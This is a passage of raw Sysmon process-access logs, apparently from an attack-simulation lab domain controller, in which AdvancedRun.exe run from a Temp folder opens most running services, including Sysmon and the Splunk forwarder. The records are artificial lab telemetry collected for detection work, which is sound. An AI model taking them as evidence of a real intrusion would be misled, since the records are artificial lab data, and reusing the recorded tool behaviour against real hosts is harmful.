10341000x80000000000000004079743Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.827{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079742Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.826{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079741Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.826{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079740Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.826{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079739Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.826{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079738Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.826{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079737Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.825{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079736Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.825{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079735Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.825{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079734Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.825{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079733Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.824{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079732Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.824{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079731Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.824{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079730Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.824{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE
10341000x80000000000000004079729Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.824{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\L